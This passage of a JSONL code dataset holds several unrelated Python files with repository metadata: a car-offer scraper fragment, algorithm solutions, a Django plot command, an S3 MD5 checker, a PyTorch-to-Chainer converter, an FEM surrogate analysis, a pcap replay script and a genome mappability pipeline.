offer_data['url']\n title = offer_data['title']\n\n if 'price' in offer_data:\n price = offer_data['price']\n else:\n price = 0\n\n release_year = offer_data['release_year']\n run = offer_data['run']\n createdon = offer_data['createdon']\n region = offer_data['region']\n source = offer_data['source']\n\n try:\n cursor.execute(\n '''\n INSERT INTO\n offers_list (offer_id, hash, url, title, price,\n release_year, run, createdon, region, source)\n VALUES\n (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n ''',\n (\n offer_id,\n offer_hash,\n url,\n title,\n price,\n release_year,\n run,\n createdon,\n region,\n source\n )\n )\n connection.commit()\n logger.warning(f'Added offer with URL {url}')\n added_offers_number += 1\n except Exception as e:\n logger.warning(\n f'Failed to add the offer with url {url} to the database. 
Error text: {str(e)}')\n\n cursor.close()\n connection.close()\n\n if added_offers_number > 0:\n logger.warning(\n f'New offers added to the database: {added_offers_number}.')\n\n\ndef get_id_hash_from_url(url):\n \"\"\"Getting `id` and `hash` values from the url.\n\n Args:\n url (string): The offer's URL.\n\n Returns:\n dict: The dictionary with id and hash.\n \"\"\"\n\n url_list = url.split('/')\n url_list = list(filter(None, url_list))\n id_hash = url_list[-1].split('-')\n\n return {\n 'id': id_hash[0],\n 'hash': id_hash[1]\n }\n\n\nif __name__ == '__main__':\n scrape_offers()\n","repo_name":"Sapfik/Practise-Python","sub_path":"autostatistic_parser-main/auto_ru/offers_scrapper.py","file_name":"offers_scrapper.py","file_ext":"py","file_size_in_byte":14419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18903180086","text":"import heapq\n\ndef solution(food_times, k):\n # if k is at least the total eating time, every food gets eaten: return -1\n if sum(food_times) <= k:\n return -1\n\n # foods with the smallest time must be removed first, so use a priority queue\n q = []\n for i in range(len(food_times)):\n heapq.heappush(q, (food_times[i], i+1))\n # push (food time, food number) pairs into the priority queue\n \n sum_value = 0 # time spent eating so far\n previous = 0 # time of the food finished most recently\n length = len(food_times) # number of remaining foods\n\n # compare (sum_value + (current food time - previous food time) * current food count) with k\n while sum_value + ((q[0][0] - previous) * length) <= k:\n # check that eating the next food completely does not exceed the time limit\n # if it does not, eat that food and remove it\n now = heapq.heappop(q)[0] # food to eat and remove\n sum_value += (now - previous) * length # account for the time spent eating it\n length -= 1 # exclude the finished food\n previous = now # reset the previous food time\n\n result = sorted(q, key = lambda x: x[1])\n # the value at index 1 is the food number.\n # sort the remaining foods by food number.\n return result[(k - sum_value) % length][1]\n # k - sum_value : time remaining after the removed foods\n # length : number of remaining foods\n\nprint(solution([3,1,2],5))\n#print(solution([4,2,9,2,8], 17))\n#print(solution([946,314,757,322,559,648,932,234,543],3021))\n\n'''\nProceed by removing the foods with the smallest time first.\n\nBefore removing a food, compute how long removing it takes\nand compare that time against the limit k.\n\nIf it does not exceed the limit, remove the food.\n\nIf it does exceed the limit, stop removing foods,\nand among the foods that remain,\nsubtract the time already spent from the limit to get the remaining time.\nThen find which food comes up once the remaining time passes.\nNo food disappears while the remaining time passes, so this is easy to compute.\n'''","repo_name":"LeeWoojin-99/Algorithm","sub_path":"316Page_answer.py","file_name":"316Page_answer.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42102428726","text":"# expt.command: step11_reduced\n\n# django\nfrom django.core.management.base import BaseCommand, CommandError\n\n# local\nfrom apps.expt.models import Series\n\n# util\nimport os\nimport numpy as np\nfrom optparse import make_option\nimport matplotlib.pyplot as plt\n\n### Command\nclass Command(BaseCommand):\n option_list = BaseCommand.option_list + (\n\n make_option('--expt', # option that will appear in cmd\n action='store', # no idea\n dest='expt', # refer to this in options variable\n default='050714', # some default\n help='Name of the experiment to import' # who cares\n ),\n\n make_option('--series', # option that will appear in cmd\n action='store', # no idea\n dest='series', # refer to this in options variable\n default='13', # some default\n help='Name of the series' # who cares\n ),\n\n )\n\n args = ''\n help = ''\n\n def handle(self, *args, **options):\n '''\n 1. What does this script do?\n > Use masks to build up larger masks surrounding markers\n\n 2. What data structures are input?\n > Mask, Gon\n\n 3. 
What data structures are output?\n > Channel, Gon, Mask\n\n 4. Is this stage repeated/one-time?\n > Repeated\n\n Steps:\n\n 1. load mask gons\n 2. stack vertically in single array\n\n '''\n\n series = Series.objects.get(experiment__name=options['expt'], name=options['series'])\n\n for cell_instance in series.cell_instances.all():\n plt.scatter(cell_instance.t, cell_instance.V(), color=['blue','red','green','yellow'][cell_instance.region.index-1])\n\n plt.show()\n","repo_name":"NicholasPiano/puzzle","sub_path":"woot/apps/expt/management/commands/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71821370721","text":"import sys\ninput = sys.stdin.readline\nimport heapq\n\n\nn,m,r = map(int,input().split())\nt = [0]+list(map(int,input().split()))\nINF = int(1e9)\narr = [[INF] * (n+1) for _ in range(n+1)]\n\nfor _ in range(r):\n\ta,b,c = map(int,input().split())\n\tarr[a][b] = c\n\tarr[b][a] = c\n\nfor i in range(n+1):\n\tarr[i][i] = 0\n\n\nfor k in range(1,n+1):\n\tfor i in range(1,n+1):\n\t\tfor j in range(1,n+1):\n\t\t\tarr[i][j] = min(arr[i][k]+ arr[k][j],arr[i][j])\n\nans = 0\n\nfor i in range(1,n+1):\n\ttmp = 0\n\tfor j in range(1,n+1):\n\t\tif arr[i][j] <= m:\n\t\t\ttmp += t[j]\n\tans = max(ans,tmp)\nprint(ans)\n\n\n","repo_name":"maantano/Coding-Test","sub_path":"파이썬/2023.11.09 서강 그라운드(14938)_최단거리_플로이드워셜.py","file_name":"2023.11.09 서강 그라운드(14938)_최단거리_플로이드워셜.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40245139877","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport sys\nimport os\nimport subprocess\nimport time\nimport argparse\nimport hashlib\n\nBATCH_SIZE = 5 # download files this many at a time\ns3_prefix = \"s3://\"\n\ndef getmd5(file_path):\n \n file_name = os.path.basename(file_path)\n \n print(\"md5 \", file_path)\n \n hash = hashlib.md5()\n with open(file_path, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash.update(chunk)\n \n print(file_name, hash.hexdigest())\n\n \ndef dobatch(filelist, **kwargs):\n downloads = [] # handles to sub-processes\n s3_cache_dir = os.environ[\"S3_CACHE_DIR\"]\n downloaded_files = []\n for filename in filelist:\n if filename.startswith(s3_prefix):\n if s3_cache_dir is None:\n raise IOError(\"Environment variable S3_CACHE_DIR not set\")\n s3_path = filename[len(s3_prefix):]\n s3_uri = filename\n local_filepath = os.path.join(s3_cache_dir, s3_path)\n \n if os.path.exists(local_filepath):\n # todo, check that the s3 object is the same as local copy\n pass\n else:\n p = subprocess.Popen(['s3cmd', 'get', s3_uri, local_filepath])\n downloads.append(p)\n downloaded_files.append(local_filepath)\n else:\n downloaded_files.append(filename)\n \n if len(downloads) > 0:\n done = False\n while not done:\n print('.')\n time.sleep(1)\n done = True\n for p in downloads:\n p.poll()\n if p.returncode is None:\n done = False # still waiting on a download\n elif p.returncode < 0:\n raise IOError(\"s3cmd failed for \" + filename)\n else:\n pass # success!\n print(\"downloads complete\")\n for filename in downloaded_files:\n getmd5(filename) \n \n \n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', \"--filename\", help=\"name of file or s3 uri\")\n parser.add_argument('-i', \"--input\", help=\"text file of files or s3 uri\")\n 
parser.add_argument('-c', \"--cluster\", help=\"cluster profile\")\n # example file:\n # public AWS -\n # s3://hdfgroup/data/hdf5test/GSSTF_NCEP.3.2000.05.01.he5\n # OSDC Ceph -\n # s3://hdfdata/ncep3/GSSTF_NCEP.3.2000.05.01.he5\n\n # example path (for above file):\n # /HDFEOS/GRIDS/NCEP/Data\\ Fields/Psea_level\n \n\n args = parser.parse_args()\n\n if not args.filename and not args.input:\n sys.exit(\"No filename specified!\")\n\n files = []\n if args.input:\n with open(args.input) as f:\n for line in f:\n line = line.strip()\n if not line or line[0] == '#':\n continue\n files.append(line) \n else:\n files.append(args.filename)\n \n \n batch = [] \n for filename in files:\n batch.append(filename)\n if len(batch) == BATCH_SIZE:\n dobatch(batch)\n batch = []\n \n dobatch(batch) # catch any trailers\n\n\nmain()\n","repo_name":"HDFGroup/datacontainer","sub_path":"filters/getmd5.py","file_name":"getmd5.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"21433934848","text":"#!/usr/bin/env python\n\nimport os.path as osp\nimport sys\n\nimport chainer\nimport chainer.links as L\nfrom chainer_cyclegan.links import InstanceNormalization\nimport numpy as np\nimport torch\n\ntorch.backends.cudnn.benchmark = True\n\nimport cv2 # NOQA\n\nhere = osp.dirname(osp.abspath(__file__))\npytorch_dir = osp.realpath(osp.join(here, '../../src/pytorch-bicyclegan'))\nsys.path.insert(0, pytorch_dir)\n\nfrom models.networks import E_ResNet\nfrom models.networks import get_non_linearity\nfrom models.networks import get_norm_layer\n\nimport chainer_bicyclegan\n\n\ndef convert_E(nz, output_nc):\n E_model_file = osp.join(here, 'data/edges2shoes_net_E.pth')\n E = E_ResNet(\n input_nc=output_nc,\n output_nc=nz,\n ndf=64,\n n_blocks=5,\n norm_layer=get_norm_layer('instance'),\n nl_layer=get_non_linearity('lrelu'),\n gpu_ids=[],\n vaeLike=True,\n )\n E.load_state_dict(torch.load(E_model_file))\n\n E_chainer = chainer_bicyclegan.models.E_ResNet(\n input_nc=output_nc,\n output_nc=nz,\n ndf=64,\n n_blocks=5,\n norm_layer='instance',\n nl_layer='lrelu',\n vaeLike=True,\n )\n\n def copyto(l2_list, l1_list):\n assert len(l2_list) == len(l1_list)\n for l1, l2 in zip(l1_list, l2_list):\n if isinstance(l2, (L.Convolution2D, L.Deconvolution2D, L.Linear)):\n np.copyto(l2.W.array, l1.weight.data.numpy())\n np.copyto(l2.b.array, l1.bias.data.numpy())\n elif isinstance(l2, InstanceNormalization):\n np.copyto(l2.avg_mean, l1.running_mean.numpy())\n np.copyto(l2.avg_var, l1.running_var.numpy())\n elif isinstance(l2, chainer_bicyclegan.models.BasicBlock):\n l2_list = l2.conv.functions\n l1_list = l1.conv\n copyto(l2_list, l1_list)\n l2_list = l2.shortcut.functions\n l1_list = l1.shortcut\n copyto(l2_list, l1_list)\n elif isinstance(l2, chainer_bicyclegan.models.Sequential):\n l2_list = l2.functions\n l1_list = l1\n copyto(l2_list, l1_list)\n else:\n print('Skip: {} -> {}'.format(type(l1), type(l2)))\n continue\n print('Copy: {} -> {}'.format(type(l1), type(l2)))\n\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print(E.fc)\n l1_list = E.fc\n l2_list = E_chainer.fc.functions\n copyto(l2_list, l1_list)\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print(E.fcVar)\n l1_list = E.fcVar\n l2_list = E_chainer.fcVar.functions\n copyto(l2_list, l1_list)\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n 
print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print(E.conv)\n l1_list = E.conv\n l2_list = E_chainer.conv.functions\n copyto(l2_list, l1_list)\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n out_file = osp.join(here, 'data/edges2shoes_net_E_from_chainer.npz')\n chainer.serializers.save_npz(out_file, E_chainer)\n\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n params = []\n for param in E.parameters():\n params.append(param.data.numpy().flatten())\n params = np.hstack(params)\n print(params.min(), params.mean(), params.max())\n print('==========================================================')\n params = []\n for param in E_chainer.params():\n params.append(param.array.flatten())\n params = np.hstack(params)\n print(params.min(), params.mean(), params.max())\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n\ndef main():\n nz = 8\n output_nc = 3\n convert_E(nz, output_nc)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wkentaro/chainer-bicyclegan","sub_path":"examples/pytorch2chainer/pytorch2chainer_E.py","file_name":"pytorch2chainer_E.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"73959481761","text":"import sys\nsys.path.append(\"./c3d8\")\nsys.path.append(\"./mesh\")\n#%%\nimport torch\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom analyze_surrogate_shape_x_c_functions import get_data_frame, get_result #, get_table\n#%%\npd.set_option(\"display.max_columns\", None)\npd.set_option('display.max_colwidth', None)\npd.set_option('display.width', 1000)\n#%%\nfolder_data='./data/343c1.5_fast/'\nfolder_result=\"./result/forward/\"\nstress='VM'\nloss1_threshold='R1'\n#%%\nBest_list=[\"Encoder3('BaseNet0',3,128,2,1,1,1,3)_Net1('BaseNet5b',3,3,512,4,1,1,1,3,'softplus')_float32\",\n 'TransEncoder4(2,256,2,16)_TransDecoder4()_float32',\n \"UNet(512)_TransDecoder4()_float32\",\n \"MeshGraphNet(3,8,5,128,3,0.1)_float32\",\n \"Linear_encoder(30000,3,0.1)_MLP1b(3,512,4,30000)_float32\",\n ]\nbest_result_val=[]\nbest_result_test=[]\nbest_result_test_r=[]\nmrse_train=[]\nmrse_val=[]\nfor name in Best_list:\n try:\n folder_net=folder_result+name+\"/0.5/matMean/\"+name+\".pt\"\n data=torch.load(folder_net, map_location='cpu')\n except:\n folder_net=folder_result+name+\"/0.5/matMean/\"+name.replace('_float32', '')+\".pt\"\n data=torch.load(folder_net, map_location='cpu')\n print(name)\n #print(data['arg'])\n\n mrse_train.append(data['mrse_train'])\n mrse_val.append(data['mrse_val'])\n\n result_val=get_data_frame(name, name.replace('_float32', ''), folder_data, folder_result,\n test_or_val='val', stress=stress, refine=False)\n result_test=get_data_frame(name, name.replace('_float32', ''), folder_data, folder_result,\n test_or_val='test', stress=stress, refine=False)\n result_test_r=get_data_frame(name, name.replace('_float32', ''), folder_data, folder_result,\n test_or_val='test', stress=stress, refine=True)\n best_result_val.append(result_val)\n best_result_test.append(result_test)\n best_result_test_r.append(result_test_r)\nbest_result_val=pd.concat(best_result_val)\nbest_result_test=pd.concat(best_result_test)\nbest_result_test_r=pd.concat(best_result_test_r)\n#%%\nidx_best=np.argmin(best_result_val['MRSE_avg'].values)\nprint(\"best val\", best_result_val.iloc[idx_best])\nprint(\"best test\", best_result_test.iloc[idx_best])\nprint(\"best test_r\", 
best_result_test_r.iloc[idx_best])\n#%%\nbest_result_test.to_csv(folder_result+\"NN_result_test.csv\")\nbest_result_test_r.to_csv(folder_result+\"NN_result_test_R.csv\")\n#%%\nfig, ax = plt.subplots(2,2,constrained_layout=True, sharex=True, sharey=True)\nax[0,0].plot(np.array(mrse_val[0])[:,0], color='r', label='W-Net'); ax[0,0].set_ylim(0, 1)\n#ax[0,0].plot(np.array(mrse_val[0])[:,0], color='m')\nax[0,1].plot(np.array(mrse_val[1])[:,0], color='g', label='TransNet'); ax[0,1].set_ylim(0, 1)\nax[1,0].plot(np.array(mrse_val[2])[:,0], color='b', label='U-Net'); ax[1,0].set_ylim(0, 1)\nax[1,1].plot(np.array(mrse_val[3])[:,0], color='c', label='MeshGraphNet'); ax[1,1].set_ylim(0, 1)\nax[0,0].legend(loc='center')\nax[0,1].legend(loc='center')\nax[1,0].legend(loc='center')\nax[1,1].legend(loc='center')\n#%%\nfor k in range(0, 4):\n mrse_train_k=np.array(mrse_train[k])[:,0]\n print(abs(mrse_train_k[-1]-mrse_train_k[-2]))\nfor k in range(0, 4):\n mrse_val_k=np.array(mrse_val[k])[:,0]\n print(abs(mrse_val_k[-1]-mrse_val_k[-2]))\n#%%\nresult=get_result(\"Encoder3('BaseNet0',3,128,2,1,1,1,3)_Net1('BaseNet5b',3,3,512,4,1,1,1,3,'softplus')_float32\",\n folder_data, folder_result, train_percent=0.5, test_or_val='test', stress='VM', refine=False)\nmrse_mean, mrse_max, MAPE_list, APE_list, time_cost, filelist_true, filelist_pred = result\n#%%\nimport numpy as np\nprint(np.sum(MAPE_list>0.1)/len(MAPE_list))\nprint(np.sum(APE_list>0.1)/len(APE_list))\n\nprint(np.sum(MAPE_list>0.05)/len(MAPE_list))\nprint(np.sum(APE_list>0.05)/len(APE_list))\n\n#%%\nfrom PolyhedronMesh import PolyhedronMesh\nfrom train_val_test_split_x_c_new1 import train_val_test_split\n\n(filelist_train, filelist_val, filelist_test,\n shape_idlist_train, shape_idlist_val, shape_idlist_test)=train_val_test_split(folder_data, 0.5)\n#%%\ndef load_mesh(filename_px, folder):\n mesh_px=PolyhedronMesh()\n mesh_px.load_from_torch(filename_px)\n mesh_p0=PolyhedronMesh()\n filename_p0=filename_px.replace('i90', 'i0')\n mesh_p0.load_from_torch(filename_p0)\n X=mesh_p0.node\n x=mesh_px.node\n return X, x\n#%%\ndef load_all(filelist, folder):\n X_all=[]; x_all=[]\n for filename_px in filelist:\n try:\n X, x=load_mesh(filename_px, folder)\n X_all.append(X)\n x_all.append(x)\n except:\n print(\"cannot load\", filename_px)\n return X_all, x_all\n#%%\nX_train, x_train=load_all(filelist_train, folder_data)\nX_val, x_val=load_all(filelist_val, folder_data)\nX_test, x_test=load_all(filelist_test, folder_data)\n#%%\nfrom sklearn.decomposition import PCA\ndata_train=[]\nfor X in X_train:\n data_train.append(X.view(1, -1).cpu())\ndata_train=torch.cat(data_train, dim=0)\ndata_train=data_train.numpy()\npca=PCA(n_components=10)\npca.fit(data_train)\n#%%\ndata_test=[]\nfor x in x_test:\n data_test.append(x.view(1, -1).cpu())\ndata_test=torch.cat(data_test, dim=0)\ndata_test=data_test.numpy()\ndata_test_rec=pca.inverse_transform(pca.transform(data_test))\n#%%\ndata_test=data_test.reshape(-1,10000,3)\ndata_test_rec=data_test_rec.reshape(-1,10000,3)\nrec_error_test=np.sqrt(((data_test_rec-data_test)**2).sum(axis=2)).mean(axis=1)\n#%%\nfrom sklearn.metrics import roc_auc_score\nBest_list=[\"Encoder3('BaseNet0',3,128,2,1,1,1,3)_Net1('BaseNet5b',3,3,512,4,1,1,1,3,'softplus')_float32\",\n 'TransEncoder4(2,256,2,16)_TransDecoder4()_float32',\n \"UNet(512)_TransDecoder4()_float32\",\n \"MeshGraphNet(3,8,5,128,3,0.1)_float32\",\n \"Linear_encoder(30000,3,0.1)_MLP1b(3,512,4,30000)_float32\",\n ]\nauc_list_rec10=[]\nauc_list_rec05=[]\nauc_list_rec01=[]\nfor name in Best_list:\n\n 
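# Editor's note: for every surrogate, the PCA reconstruction error of the test shapes (rec_error_test) serves as an out-of-distribution score; result_test[3] is the APE list, so roc_auc_score(result_test[3]>0.10, rec_error_test) below asks how well reconstruction error separates shapes whose prediction error exceeds 10 percent.\n    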
result_test=get_result(name, folder_data, folder_result, 0.5,\n test_or_val='test', stress=stress, refine=False)\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, rec_error_test)\n auc05 = roc_auc_score(result_test[3]>0.05, rec_error_test)\n auc01 = roc_auc_score(result_test[3]>0.01, rec_error_test)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_rec10.append(auc10)\n auc_list_rec05.append(auc05)\n auc_list_rec01.append(auc01)\n fig, ax = plt.subplots()\n #ax.hist(result_test[3], bins=100)\n ax.plot(rec_error_test, result_test[3], '.')\n #ax.set_ylim(0,1)\n ax.set_title(name)\n ax.set_xlabel(str(auc10)+' '+str(auc05)+' '+str(auc01))\n#%%\nfrom AortaFEModel_C3D8_SRI import AortaFEModel\nfrom Mat_GOH_SRI import cal_1pk_stress, cal_cauchy_stress\nfrom aorta_mesh import get_solid_mesh_cfg\ndevice=torch.device(\"cuda:0\")\ndtype=torch.float64\n#%%\nfilename_shell='./data/bav17_AortaModel_P0_best.pt'\n(boundary0, boundary1, Element_surface_pressure, Element_surface_free)=get_solid_mesh_cfg(filename_shell)\nMat=torch.load('./data/125mat.pt')['mean_mat_str']\nMat=[float(m) for m in Mat.split(\",\")]\nMat[4]=np.pi*(Mat[4]/180)\nMat=torch.tensor([Mat], dtype=dtype, device=device)\n#%%\nauc_list_Rmean10=[]\nauc_list_Rmean05=[]\nauc_list_Rmean01=[]\nauc_list_Rmax10=[]\nauc_list_Rmax05=[]\nauc_list_Rmax01=[]\nauc_list_loss10=[]\nauc_list_loss05=[]\nauc_list_loss01=[]\nfor name in Best_list:\n result_test=get_result(name, folder_data, folder_result, 0.5,\n test_or_val='test', stress=stress, refine=False)\n filelist_test_pred=result_test[-1]\n loss1_list=[]\n Rmean_list=[]\n Rmax_list=[]\n for k in range(0, len(filelist_test)):\n mesh_p0=filelist_test[k].replace(\"i90\", \"i0\")\n mesh_px=filelist_test_pred[k]\n pressure=18\n\n Mesh_X=PolyhedronMesh()\n Mesh_X.load_from_torch(mesh_p0)\n Node_X=Mesh_X.node.to(dtype).to(device)\n Element=Mesh_X.element.to(device)\n\n Mesh_x=PolyhedronMesh()\n Mesh_x.load_from_torch(mesh_px)\n Node_x=Mesh_x.node.to(dtype).to(device)\n\n aorta_model=AortaFEModel(Node_x, Element, Node_X, boundary0, boundary1, Element_surface_pressure,\n Mat, cal_1pk_stress, cal_cauchy_stress, dtype, device, mode='inflation')\n out=aorta_model.cal_energy_and_force(pressure)\n\n TPE1=out['TPE1']; TPE2=out['TPE2']; SE=out['SE']\n force_int=out['force_int']; force_ext=out['force_ext']\n force_int_of_element=out['force_int_of_element'].detach()\n loss1=((force_int-force_ext)**2).sum(dim=1).sqrt().mean().item()\n loss1_list.append(loss1)\n force_avg=(force_int_of_element**2).sum(dim=2).sqrt().mean()\n force_res=((force_int-force_ext)**2).sum(dim=1).sqrt()\n R=force_res/(force_avg+1e-10)\n Rmean=R.mean().item()\n Rmax=R.max().item()\n Rmax_list.append(Rmax)\n Rmean_list.append(Rmean)\n #-----------\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, Rmean_list)\n auc05 = roc_auc_score(result_test[3]>0.05, Rmean_list)\n auc01 = roc_auc_score(result_test[3]>0.01, Rmean_list)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_Rmean10.append(auc10)\n auc_list_Rmean05.append(auc05)\n auc_list_Rmean01.append(auc01)\n #----------------------------\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, Rmax_list)\n auc05 = roc_auc_score(result_test[3]>0.05, Rmax_list)\n auc01 = roc_auc_score(result_test[3]>0.01, Rmax_list)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_Rmax10.append(auc10)\n auc_list_Rmax05.append(auc05)\n auc_list_Rmax01.append(auc01)\n #----------------------------\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, loss1_list)\n auc05 = 
roc_auc_score(result_test[3]>0.05, loss1_list)\n auc01 = roc_auc_score(result_test[3]>0.01, loss1_list)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_loss10.append(auc10)\n auc_list_loss05.append(auc05)\n auc_list_loss01.append(auc01)\n #----------------------------\n fig, ax = plt.subplots()\n #ax.hist(result_test[3], bins=100)\n ax.plot(rec_error_test, result_test[3], '.')\n #ax.set_ylim(0,1)\n ax.set_title(name)\n ax.set_xlabel(str(auc10)+' '+str(auc05)+' '+str(auc01))\n#%%\n\ndf=pd.DataFrame()\ndf['method']=['rec', \"loss1\", 'Rmean', 'Rmax']\nfor k in range(0, len(Best_list)):\n name=Best_list[k][0:3]\n df[name]=[auc_list_rec10[k], auc_list_loss10[k], auc_list_Rmean10[k], auc_list_Rmax10[k]]\nprint(df)\ndf.to_csv(folder_result+\"ood_detection_0.10.csv\", index=False)\n\ndf=pd.DataFrame()\ndf['method']=['rec', \"loss1\", 'Rmean', 'Rmax']\nfor k in range(0, len(Best_list)):\n name=Best_list[k][0:3]\n df[name]=[auc_list_rec05[k], auc_list_loss05[k], auc_list_Rmean05[k], auc_list_Rmax05[k]]\nprint(df)\ndf.to_csv(folder_result+\"ood_detection_0.05.csv\", index=False)\n\ndf=pd.DataFrame()\ndf['method']=['rec', \"loss1\", 'Rmean', 'Rmax']\nfor k in range(0, len(Best_list)):\n name=Best_list[k][0:3]\n df[name]=[auc_list_rec01[k], auc_list_loss01[k], auc_list_Rmean01[k], auc_list_Rmax01[k]]\nprint(df)\ndf.to_csv(folder_result+\"ood_detection_0.01.csv\", index=False)\n\n","repo_name":"liangbright/DNN_FEM_Integration","sub_path":"analyze_surrogate_shape_x_c_use_meanshape_new1.py","file_name":"analyze_surrogate_shape_x_c_use_meanshape_new1.py","file_ext":"py","file_size_in_byte":11263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15194907620","text":"from scapy.all import rdpcap, IP, sendp\n\n# Path to your Wireshark capture file\ncapture_file = \"/home/sctsim/copied_from_wipac/copy_folder/already_extracted_files/Module12345/Run_Wireshark_Capture.pcapng\"\n\n# Read the capture file\npackets = rdpcap(capture_file)\n\nfor packet in packets:\n if IP in packet:\n # Change the destination IP address\n packet[IP].dst = \"192.168.1.61\"\n\n # Send the packet\n sendp(packet)\n\n","repo_name":"brycehoecker/TargetLibraries_sctsim","sub_path":"readAndSendWireshark.py","file_name":"readAndSendWireshark.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4704222223","text":"\"\"\"\n=====================\nMappability pipeline\n=====================\n\nPipeline to count mappable bases in a given genome\n\n\"\"\"\nimport sys\nimport os\n\nfrom ruffus import *\nimport CGAT.Experiment as E\nimport CGATPipelines.Pipeline as P\n\n\n###################################################\n# Pipeline configuration\n###################################################\nP.getParameters(\n [\"%s/pipeline.ini\" % os.path.splitext(__file__)[0],\n \"../pipeline.ini\",\n \"pipeline.ini\"],\n defaults={\n 'paired_end': False})\n\nPARAMS = P.PARAMS\n\n\n@files(os.path.join(PARAMS[\"gem_dir\"], PARAMS[\"genome\"] + \".gem\"),\n PARAMS[\"genome\"] + \".mappability\")\ndef calculateMappability(infile, outfile):\n '''Calculate mappability using GEM '''\n index = P.snip(infile, \".gem\")\n statement = '''gem-mappability\n -t %(gem_threads)s -m %(gem_mismatches)s\n --max-indel-length %(gem_max_indel_length)s\n -l %(gem_window_size)s -I %(index)s -o %(outfile)s '''\n 
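# Editor's note: gem-mappability writes one character per genome position; the downstream countMappableBases step counts '!' characters (uniquely mappable bases) via: cat %(infile)s | tr -cd ! | wc -c\n    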
P.run()\n\n###################################################################\n\n\n@transform(calculateMappability, suffix(\".mappability\"), \".mappability.count\")\ndef countMappableBases(infile, outfile):\n '''Count mappable bases in genome'''\n statement = '''cat %(infile)s | tr -cd ! | wc -c > %(outfile)s'''\n P.run()\n\n###################################################################\n\n\n@transform(countMappableBases, suffix(\".count\"), \".count.load\")\ndef loadMappableBases(infile, outfile):\n '''load count of mappable bases in genome'''\n header = \"total_mappable_bases\"\n statement = '''cat %(infile)s | cgat csv2db\n --table=total_mappable_bases\n --header-names=%(header)s\n > %(outfile)s '''\n P.run()\n\n###################################################################\n\n\n@transform(calculateMappability, suffix(\".mappability\"), \".split.log\")\ndef splitMappabiliyFileByContig(infile, outfile):\n '''Count mappable bases in genome'''\n track = P.snip(os.path.basename(infile), \".mappability\")\n statement = '''mkdir contigs; \n csplit -k -f contigs/contig %(infile)s '/^~[a-zA-Z]/' {100000} > %(outfile)s;\n rm contigs/contig00;'''\n P.run()\n\n###################################################################\n\n\n@follows(splitMappabiliyFileByContig)\n@merge(\"contigs/contig*\", PARAMS[\"genome\"] + \"_mappability_per_contig.tsv\")\ndef countMappableBasesPerContig(infiles, outfile):\n '''Count mappable bases for each contig'''\n for infile in infiles:\n statement = '''grep '~' %(infile)s | sed s/~//g >> %(outfile)s; cat %(infile)s | tr -cd ! | wc -c >> %(outfile)s'''\n P.run()\n\n statement = '''sed -i '{N;s/\\\\n/\\\\t/g}' %(outfile)s;'''\n P.run()\n\n###################################################################\n\n\n@transform(countMappableBasesPerContig, suffix(\".tsv\"), \".tsv.load\")\ndef loadMappableBasesPerContig(infile, outfile):\n '''load count of mappable bases per contig '''\n header = \"contig,mappable_bases\"\n statement = '''cat %(infile)s | cgat csv2db\n --table=mappable_bases_per_contig\n --header-names=%(header)s\n > %(outfile)s '''\n P.run()\n\n###################################################################\n###################################################################\n###################################################################\n\n\n@follows(calculateMappability, countMappableBases,\n loadMappableBases, splitMappabiliyFileByContig,\n countMappableBasesPerContig, loadMappableBasesPerContig)\ndef full():\n '''Count mappable bases in genome'''\n pass\n\nif __name__ == \"__main__\":\n sys.exit(P.main(sys.argv))\n","repo_name":"CGATOxford/CGATPipelines","sub_path":"obsolete/pipeline_mappability.py","file_name":"pipeline_mappability.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"54"} +{"seq_id":"18632090088","text":"from abc import ABC, abstractmethod\nfrom collections import defaultdict\nfrom functools import 